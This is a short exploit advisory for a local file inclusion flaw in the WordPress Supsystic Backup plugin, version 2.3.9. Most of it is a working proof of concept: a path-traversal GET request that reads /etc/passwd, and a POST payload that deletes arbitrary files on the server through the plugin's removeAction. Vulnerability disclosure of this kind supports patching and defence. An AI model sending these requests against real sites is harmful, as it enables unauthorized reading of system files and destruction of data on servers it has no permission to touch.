WordPress Supsystic Backup 2.3.9 Local File Inclusion

WordPress Supsystic Backup 2.3.9 Local File Inclusion

WordPress Supsystic Backup plugin version 2.3.9 suffers from a local file inclusion vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 1. Description

Changing the path when downloading the stored backup allows an attacker to both read and delete internal system files (LFI).


# 2. Proof of Concept (PoC)

Create a backup. When downloading the backup, change its path:

GET http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd


The "Delete" tab also allows an attacker to delete files on the server:

POST http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog
Payload: reqType=ajax&page=backup&action=removeAction&filename=[FILE PATH]&deleteLog=1&pl=bup